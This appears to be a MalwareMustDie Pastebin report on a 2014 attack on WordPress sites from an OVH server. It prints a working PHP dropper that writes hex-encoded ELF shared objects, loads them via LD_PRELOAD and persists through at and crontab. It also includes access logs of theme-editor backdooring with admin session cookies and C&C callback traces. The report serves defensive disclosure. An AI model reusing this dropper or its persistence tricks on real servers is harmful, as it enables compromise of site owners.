MalwareMustDie

LD_PRELOAD .SO ELF MALWARE FRESH ATTACK FROM OVH, FRANCE!

May 27th, 2014
2,872
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // #MalwareMustDie!! LD_PRELOAD .SO ELF MALWARE FRESH ATTACK FROM OVH, FRANCE!
  2. // Date: 03:28 -!- sendak.freenode.net Tuesday May 27 2014 -- 21:28:36 +03:00
  3. //
  4. // This is the evidence that OVH, France IP address of :
  5. // ns238857.ip-176-31-251.eu (176.31.251.103) which network details:
  6. // ASN : 16276 |Prefix: 176.31.0.0/16 | OVH | FR | OVH.COM | OVH SAS
  7. // is used to attack Wordpress sites in multiple services,
  8. // and executing the hacked fake oldstyle.php script to install malware,
  9. // with the malicious definition known as .SO (LD_PRELOAD) ELF malware
  10. //Reference: http://blog.malwaremustdie.org/2014/05/elf-shared-so-dynamic-library-malware.html
  11.  
  12.  
  13. //====================================
  14. // Installation Evidence Log
  15. //====================================
  16.  
  17. // malware remote installation & execution evidence log:
  18.  
  19. ns238857.ip-176-31-251.eu - - [27/May/2014:08:24:14 +0900] "GET /wp/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/oldstyle.php HTTP/1.1" 200 113 "-" "Python-urllib/2.7" "-"
  20.  
  21. //====================================
  22. // Malware code in the oldstyle.php
  23. //====================================
  24.  
  25. $ cat oldstyle.php
  26.  
  27.  
  28. <?php
  29.  
  30. header("Content-type: text/plain");
  31. print "2842123700\n";
  32.  
  33. if (! function_exists('file_put_contents')) {
  34.         function file_put_contents($filename, $data) {
  35.                 $f = @fopen($filename, 'w');
  36.                 if (! $f)
  37.                         return false;
  38.                 $bytes = fwrite($f, $data);
  39.                 fclose($f);
  40.                 return $bytes;
  41.         }
  42. }
  43.  
  44. @system("killall -9 ".basename("/usr/bin/host"));
  45.  
  46. $so32 = "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x03\x00\x01\x00\x00\x00\x54\x0d\x00\x00\x34\x00\x00\x00\xb8\x59\x01\x00\x00\x00\x00\x00\x34\x00\x20\x00\x03\x00\x28\x00\x16\x00\x13\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfb\x60\x00\x00\xfb\x60\x00\x00\x05\x00\x00\x00\x00\x10\x00\x00\x01\x00\x00\x00\xfc\x60\x00\x00\xfc\x70\x00\x00\xfc\x70\x00\x00\xf0\x07\x00\x00\xac\x61\x00\x00\x06\x00\x00\x00\x00\x10\x00\x00\x02\x00\x00\x00\xfc\x60\x00\x00\xfc\x70\x00\x00\xfc\x70\x00\x00\x90\x00\x00\x00\x90\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x25\x00\x00\x00\x3c\x00\x00\x00\x21\x00\x00\x00\x31\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x2c\x00\x00\x00\x11\x00\x00\x00\x1c\x00\x00\x00\x28\x00\x00\x00\x2f\x00\x00\x00\x3b\x00\x00\x00\x29\x00\x00\x00\x39\x00\x00\x00\x15\x00\x00\x00\x05\x00\x00\x00\x2d\x00\x00\x00\x00\x00\x00\x00\x38\x00\x00\x00\x33\x00\x00\x00\x1b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x24\x00\x00\x00\x00\x00\x00\x00\x32\x00\x00\x00\x1e\x00\x00\x00\x3a\x00\x00\x00\x2a\x00\x00\x00\x34\x00\x00\x00\x36\x00\x00\x00\x23\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x00\x1d\x00\x00\x00\x19\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x27\x00\x00\x00\x25\x00\x00\x00\x22\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x26\x00\x00\x00\x2b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x2e\x00\x00\x00\x1f\x00\x00\x00\x35\x00\x00\x00\x37\x00\x00\x00\x13\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x57\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\xe6\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\xad\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\xb6\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x87\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x23\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\xa5\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x0
  47. [snipped...] ";
  48. $so64 = "\x7f\x45\x4c\x46\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x3e\x00\x01\x00\x00\x00\x78\x13\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xf0\xc4\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x38\x00\x03\x00\x40\x00\x16\x00\x13\x00\x01\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x60\x00\x00\x00\x00\x00\x00\xf0\x60\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\xf0\x60\x00\x00\x00\x00\x00\x00\xf0\x60\x20\x00\x00\x00\x00\x00\xf0\x60\x20\x00\x00\x00\x00\x00\x98\x09\x00\x00\x00\x00\x00\x00\x08\x75\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00\xf0\x60\x00\x00\x00\x00\x00\x00\xf0\x60\x20\x00\x00\x00\x00\x00\xf0\x60\x20\x00\x00\x00\x00\x00\x20\x01\x00\x00\x00\x00\x00\x00\x20\x01\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x25\x00\x00\x00\x3d\x00\x00\x00\x22\x00\x00\x00\x32\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x31\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x2d\x00\x00\x00\x12\x00\x00\x00\x1d\x00\x00\x00\x29\x00\x00\x00\x30\x00\x00\x00\x3c\x00\x00\x00\x2a\x00\x00\x00\x3a\x00\x00\x00\x16\x00\x00\x00\x06\x00\x00\x00\x2e\x00\x00\x00\x00\x00\x00\x00\x39\x00\x00\x00\x34\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x25\x00\x00\x00\x00\x00\x00\x00\x33\x00\x00\x00\x1f\x00\x00\x00\x3b\x00\x00\x00\x2b\x00\x00\x00\x35\x00\x00\x00\x37\x00\x00\x00\x24\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x0d\x00\x00\x00\x05\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00\x1e\x00\x00\x00\x1a\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1b\x00\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x28\x00\x00\x00\x26\x00\x00\x00\x23\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x15\x00\x00\x00\x00\x00\x00\x00\x27\x00\x00\x00\x2c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x2f\x00\x00\x00\x20\x00\x00\x00\x36\x00\x00\x00\x38\x00\x00\x00\x14\x00\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x07\x00\x78\x13\x00\x00\x00\x00\x00\x00\x0[snipped...] ";
  49. $arch = 64;
  50. if (intval("9223372036854775807") == 2147483647)
  51.         $arch = 32;
  52. print "Arch is ".$arch."\n";
  53. $so = $arch == 32 ? $so32 : $so64;
  54. $f = fopen("/usr/bin/host", "rb");
  55. if ($f) {
  56.         $n = unpack("C*", fread($f, 8));
  57.         $so[7] = sprintf("%c", $n[8]);
  58.         print "System is ".($n[8] == 9 ? "FreeBSD" : "Linux")."\n";
  59.         fclose($f);
  60. }
  61. print "SO dumped ".file_put_contents("./rss-aggr.so", $so)."\n";
  62. if (getenv("MAYHEM_DEBUG"))
  63.         exit(0);
  64. $AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  65. /* second stage dropper */
  66. $HBN=basename("/usr/bin/host");
  67. $SCP=getcwd();
  68. $SCR  ="#!/bin/sh\ncd '".$SCP."'\nif [ -f './rss-aggr.so' ];then killall -9 $HBN;export AU='".$AU."'\nexport LD_PRELOAD=./rss-aggr.so\n/usr/bin/host\nunset LD_PRELOAD\n";
  69. $SCR .="crontab -l|grep -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n";
  70. @file_put_contents("1.sh", $SCR);
  71. @chmod("1.sh", 0777);
  72. /* try at now, file will be removed, crontab cleaned on success */
  73. @system("at now -f 1.sh", $ret);
  74. if ($ret == 0) {
  75.         for ($i = 0; $i < 5; $i++) {
  76.                 if (! @file_exists("1.sh")) {
  77.                         print "AT success\n";
  78.                         exit(0);
  79.                 }
  80.                 sleep(1);
  81.         }
  82. }
  83. @system("(crontab -l|grep -v crontab;echo;echo '* * * * * ".$SCP."/1.sh')|crontab", $ret);
  84. if ($ret == 0) {
  85.         for ($i = 0; $i < 62; $i++) {
  86.                 if (! @file_exists("1.sh")) {
  87.                         print "CRONTAB success\n";
  88.                         exit(0);
  89.                 }
  90.                 sleep(1);
  91.         }
  92. }
  93. print "Running straight\n";
  94. @system("./1.sh");
  95.  
  96. ?>
  97.  
  98. //=========================
  99. // Attack session...(TODAY)
  100. //=========================
  101.  
  102. ns238857.ip-176-31-251.eu - - [27/May/2014:07:15:42 +0900] "POST /wp/wp-content/themes/****/styleimage.php HTTP/1.1" 200 68452 "-" "Mozilla/5.0 (Windows NT 6.0; rv:24.0) Gecko/20100101 Firefox/24.0" "-"
  103.  
  104. ns238857.ip-176-31-251.eu - - [27/May/2014:07:15:43 +0900] "POST /wp/wp-content/themes/****/styleimage.php HTTP/1.1" 200 10139 "-" "Mozilla/5.0 (Windows NT 6.0; rv:21.0) Gecko/20130331 Firefox/21.0" "0a4673cd7b4e1c6f285fce5516ace5af=cef26cef9c9fdbdb49363368c8921635"
  105.  
  106. ns238857.ip-176-31-251.eu - - [27/May/2014:07:26:22 +0900] "POST /wp/wp-content/themes/****/styleimage.php HTTP/1.1" 200 309874 "-" "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0" "0a4673cd7b4e1c6f285fce5516ace5af=cef26cef9c9fdbdb49363368c8921635; 0a4673cd7b4e1c6f285fce5516ace5afajax=0"
  107.  
  108. ns238857.ip-176-31-251.eu - - [27/May/2014:08:24:14 +0900] "GET /wp/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/oldstyle.php HTTP/1.1" 200 113 "-" "Python-urllib/2.7" "-"
  109.  
  110. ns238857.ip-176-31-251.eu - - [27/May/2014:08:37:07 +0900] "POST /wp/wp-content/themes/****/styleimage.php HTTP/1.1" 200 26722 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36" "-"
  111.  
  112. ns238857.ip-176-31-251.eu - - [27/May/2014:08:37:10 +0900] "POST /wp/wp-content/themes/****/styleimage.php HTTP/1.1" 200 10955 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36" "0a4673cd7b4e1c6f285fce5516ace5af=cef26cef9c9fdbdb49363368c8921635"
  113.  
  114. ns238857.ip-176-31-251.eu - - [27/May/2014:08:37:11 +0900] "GET /wp/wp-content/themes/twentytwelve/content.php?req=echo'req'; HTTP/1.1" 200 15 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36" "0a4673cd7b4e1c6f285fce5516ace5af=cef26cef9c9fdbdb49363368c8921635; 0a4673cd7b4e1c6f285fce5516ace5afajax=0"
  115.  
  116. ns238857.ip-176-31-251.eu - - [27/May/2014:08:37:12 +0900] "GET /wp/wp-admin/options-discussion.php?req=echo'req'; HTTP/1.1" 200 15 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36" "0a4673cd7b4e1c6f285fce5516ace5af=cef26cef9c9fdbdb49363368c8921635; 0a4673cd7b4e1c6f285fce5516ace5afajax=0"
  117.  
  118. ns238857.ip-176-31-251.eu - - [27/May/2014:08:37:13 +0900] "GET /wp/wp-admin/includes/revision.php?req=echo'req'; HTTP/1.1" 200 15 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36" "0a4673cd7b4e1c6f285fce5516ace5af=cef26cef9c9fdbdb49363368c8921635; 0a4673cd7b4e1c6f285fce5516ace5afajax=0"
  119.  
  120. ns238857.ip-176-31-251.eu - - [27/May/2014:08:37:15 +0900] "GET /wp/wp-admin/includes/class-wp-comments-list-table.php?req=echo'req'; HTTP/1.1" 200 15 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36" "0a4673cd7b4e1c6f285fce5516ace5af=cef26cef9c9fdbdb49363368c8921635; 0a4673cd7b4e1c6f285fce5516ace5afajax=0"
  121.  
  122. ns238857.ip-176-31-251.eu - - [27/May/2014:08:37:16 +0900] "GET /wp/wp-includes/load.php?req=echo'req'; HTTP/1.1" 200 15 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36" "0a4673cd7b4e1c6f285fce5516ace5af=cef26cef9c9fdbdb49363368c8921635; 0a4673cd7b4e1c6f285fce5516ace5afajax=0"
  123.  
  124. //=====================================
  125. // different session... (YESTERDAY)
  126. //======================================
  127.  
  128. ns238857.ip-176-31-251.eu - - [26/May/2014:07:48:55 +0900] "GET /wp/wp-login.php HTTP/1.1" 200 3983 "-" "Opera/9.80 (Windows NT 6.1; WOW64); U) Presto/2.10.181 Version/12.00" "-"
  129.  
  130. ns238857.ip-176-31-251.eu - - [26/May/2014:07:48:56 +0900] "POST /wp/wp-login.php HTTP/1.1" 302 5 "-" "Opera/9.80 (Windows NT 6.1; WOW64); U) Presto/2.10.181 Version/12.00" "wordpress_test_cookie=WP+Cookie+check"
  131.  
  132. ns238857.ip-176-31-251.eu - - [26/May/2014:07:48:58 +0900] "GET /wp/wp-admin/ HTTP/1.1" 200 72133 "-" "Opera/9.80 (Windows NT 6.1; WOW64); U) Presto/2.10.181 Version/12.00" "wordpress_test_cookie=WP+Cookie+check; wordpress_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7Cd7914bad4a2f1d680402e6c2a63239bb; wordpress_logged_in_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7C48f7dfaaa9d6a8da8bb7c9dd75721049"
  133.  
  134. ns238857.ip-176-31-251.eu - - [26/May/2014:07:49:00 +0900] "GET /wp/wp-admin/ HTTP/1.1" 200 72809 "-" "Opera/9.80 (Windows NT 6.1; WOW64); U) Presto/2.10.181 Version/12.00" "wordpress_test_cookie=WP+Cookie+check; wordpress_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7Cd7914bad4a2f1d680402e6c2a63239bb; wordpress_logged_in_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7C48f7dfaaa9d6a8da8bb7c9dd75721049; wp-settings-time-1=1401058137"
  135.  
  136. ns238857.ip-176-31-251.eu - - [26/May/2014:07:49:03 +0900] "GET /wp/wp-admin/theme-editor.php HTTP/1.1" 200 28223 "-" "Opera/9.80 (Windows NT 6.1; WOW64); U) Presto/2.10.181 Version/12.00" "wordpress_test_cookie=WP+Cookie+check; wordpress_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7Cd7914bad4a2f1d680402e6c2a63239bb; wordpress_logged_in_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7C48f7dfaaa9d6a8da8bb7c9dd75721049; wp-settings-time-1=1401058140"
  137.  
  138. ns238857.ip-176-31-251.eu - - [26/May/2014:07:49:04 +0900] "GET /wp/wp-admin/theme-editor.php?file=about01.php&theme=**** HTTP/1.1" 200 35390 "-" "Opera/9.80 (Windows NT 6.1; WOW64); U) Presto/2.10.181 Version/12.00" "wordpress_test_cookie=WP+Cookie+check; wordpress_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7Cd7914bad4a2f1d680402e6c2a63239bb; wordpress_logged_in_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7C48f7dfaaa9d6a8da8bb7c9dd75721049; wp-settings-time-1=1401058142"
  139.  
  140. ns238857.ip-176-31-251.eu - - [26/May/2014:07:49:04 +0900] "POST /wp/wp-admin/theme-editor.php HTTP/1.1" 302 5 "-" "Opera/9.80 (Windows NT 6.1; WOW64); U) Presto/2.10.181 Version/12.00" "wordpress_test_cookie=WP+Cookie+check; wordpress_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7Cd7914bad4a2f1d680402e6c2a63239bb; wordpress_logged_in_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7C48f7dfaaa9d6a8da8bb7c9dd75721049; wp-settings-time-1=1401058144"
  141.  
  142. ns238857.ip-176-31-251.eu - - [26/May/2014:07:49:06 +0900] "GET /theme-editor.php?file=about01.php&theme=****&scrollto=0&updated=true HTTP/1.1" 404 17770 "-" "Opera/9.80 (Windows NT 6.1; WOW64); U) Presto/2.10.181 Version/12.00" "wordpress_test_cookie=WP+Cookie+check; wordpress_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7Cd7914bad4a2f1d680402e6c2a63239bb; wordpress_logged_in_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7C48f7dfaaa9d6a8da8bb7c9dd75721049; wp-settings-time-1=1401058144"
  143.  
  144. ns238857.ip-176-31-251.eu - - [26/May/2014:07:49:08 +0900] "POST /wp/wp-content/themes/****/about01.php HTTP/1.1" 200 59 "-" "Opera/9.80 (Windows NT 6.1; WOW64); U) Presto/2.10.181 Version/12.00" "wordpress_test_cookie=WP+Cookie+check; wordpress_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7Cd7914bad4a2f1d680402e6c2a63239bb; wordpress_logged_in_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7C48f7dfaaa9d6a8da8bb7c9dd75721049; wp-settings-time-1=1401058144"
  145.  
  146. ns238857.ip-176-31-251.eu - - [26/May/2014:07:49:09 +0900] "GET /wp/wp-content/themes/****/styleimage.php HTTP/1.1" 200 132 "-" "Opera/9.80 (Windows NT 6.1; WOW64); U) Presto/2.10.181 Version/12.00" "wordpress_test_cookie=WP+Cookie+check; wordpress_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7Cd7914bad4a2f1d680402e6c2a63239bb; wordpress_logged_in_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7C48f7dfaaa9d6a8da8bb7c9dd75721049; wp-settings-time-1=1401058144"
  147.  
  148. ns238857.ip-176-31-251.eu - - [26/May/2014:07:49:10 +0900] "POST /wp/wp-admin/theme-editor.php HTTP/1.1" 302 5 "-" "Opera/9.80 (Windows NT 6.1; WOW64); U) Presto/2.10.181 Version/12.00" "wordpress_test_cookie=WP+Cookie+check; wordpress_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7Cd7914bad4a2f1d680402e6c2a63239bb; wordpress_logged_in_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7C48f7dfaaa9d6a8da8bb7c9dd75721049; wp-settings-time-1=1401058144"
  149.  
  150. ns238857.ip-176-31-251.eu - - [26/May/2014:07:49:11 +0900] "GET /theme-editor.php?file=about01.php&theme=****&scrollto=0&updated=true HTTP/1.1" 404 17805 "-" "Opera/9.80 (Windows NT 6.1; WOW64); U) Presto/2.10.181 Version/12.00" "wordpress_test_cookie=WP+Cookie+check; wordpress_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7Cd7914bad4a2f1d680402e6c2a63239bb; wordpress_logged_in_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7C48f7dfaaa9d6a8da8bb7c9dd75721049; wp-settings-time-1=1401058144"
  151.  
  152. ns238857.ip-176-31-251.eu - - [26/May/2014:17:17:05 +0900] "POST /wp/wp-content/themes/****/styleimage.php HTTP/1.1" 200 68487 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130331 Firefox/21.0" "-"
  153.  
  154. ns238857.ip-176-31-251.eu - - [26/May/2014:17:17:07 +0900] "POST /wp/wp-content/themes/****/styleimage.php HTTP/1.1" 200 10146 "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/25.0" "0a4673cd7b4e1c6f285fce5516ace5af=cef26cef9c9fdbdb49363368c8921635"
  155.  
  156. ns238857.ip-176-31-251.eu - - [26/May/2014:18:17:52 +0900] "POST /wp/wp-content/themes/****/styleimage.php HTTP/1.1" 200 10139 "-" "Mozilla/5.0 (Windows NT 6.0; rv:21.0) Gecko/20130331 Firefox/21.0" "0a4673cd7b4e1c6f285fce5516ace5af=cef26cef9c9fdbdb49363368c8921635; 0a4673cd7b4e1c6f285fce5516ace5afajax=0"
  157.  
  158. ns238857.ip-176-31-251.eu - - [26/May/2014:18:21:25 +0900] "POST /wp/wp-content/themes/****/styleimage.php HTTP/1.1" 200 68459 "-" "Mozilla/5.0 (Windows NT 6.0; rv:23.0) Gecko/20130406 Firefox/23.0" "-"
  159.  
  160. ns238857.ip-176-31-251.eu - - [26/May/2014:18:21:27 +0900] "POST /wp/wp-content/themes/****/styleimage.php HTTP/1.1" 200 10139 "-" "Mozilla/5.0 (Windows NT 6.2; rv:21.0) Gecko/20130331 Firefox/21.0" "0a4673cd7b4e1c6f285fce5516ace5af=cef26cef9c9fdbdb49363368c8921635"
  161.  
  162. ns238857.ip-176-31-251.eu - - [26/May/2014:18:28:12 +0900] "POST /wp/wp-content/themes/****/styleimage.php HTTP/1.1" 200 10139 "-" "Mozilla/5.0 (Windows NT 5.1; rv:22.0) Gecko/20130405 Firefox/22.0" "0a4673cd7b4e1c6f285fce5516ace5af=cef26cef9c9fdbdb49363368c8921635; 0a4673cd7b4e1c6f285fce5516ace5afajax=0"
  163.  
  164. ns238857.ip-176-31-251.eu - - [26/May/2014:19:27:24 +0900] "POST /wp/wp-content/themes/****/styleimage.php HTTP/1.1" 200 68466 "-" "Mozilla/5.0 (Windows NT 6.2; rv:21.0) Gecko/20130331 Firefox/21.0" "-"
  165.  
  166. ns238857.ip-176-31-251.eu - - [26/May/2014:19:27:26 +0900] "POST /wp/wp-content/themes/****/styleimage.php HTTP/1.1" 200 10146 "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/25.0" "0a4673cd7b4e1c6f285fce5516ace5af=cef26cef9c9fdbdb49363368c8921635"
  167.  
  168. ns238857.ip-176-31-251.eu - - [26/May/2014:19:31:43 +0900] "POST /wp/wp-content/themes/****/styleimage.php HTTP/1.1" 200 28361 "-" "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0" "0a4673cd7b4e1c6f285fce5516ace5af=cef26cef9c9fdbdb49363368c8921635; 0a4673cd7b4e1c6f285fce5516ace5afajax=0"
  169.  
  170. // ================================
  171. // Malware CNC call back Analysis
  172. // ================================
  173.  
  174. // HTTP traces:
  175.  
  176. POST /closed.php HTTP/1.0
  177. Host: closed.red
  178. Pragma: 1337
  179. Content-Length: xxx
  180. R,20130826,(CPU x32|64),0,,{uname -a data},
  181.  
  182. // capture pic:
  183. https://lh3.googleusercontent.com/-dVvGlUpVUy8/U4Ugr_iqcrI/AAAAAAAAP48/UiB2Y-3uK4Y/s640/010.png
  184.  
  185. // IP:
  186.  
  187. $ date
  188. Wed May 28 08:02:32 JST 2014
  189. $
  190. $ echo 37.48.87.148|bash origin.sh
  191. Wed May 28 08:03:03 JST 2014|37.48.87.148|vps5106.megahoster.net.|16265 | 37.48.64.0/18 | FIBERRING | NL | LEASEWEB.COM | LEASEWEB B.V.
  192. $
  193.  
  194. ----
  195. #MalwareMustDie!
  196. analyzed & reported by @unixfreaxjp、alert by maeda shohei
  197. 03:28 -!- sendak.freenode.net Tuesday May 27 2014 -- 21:28:36 +03:00
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×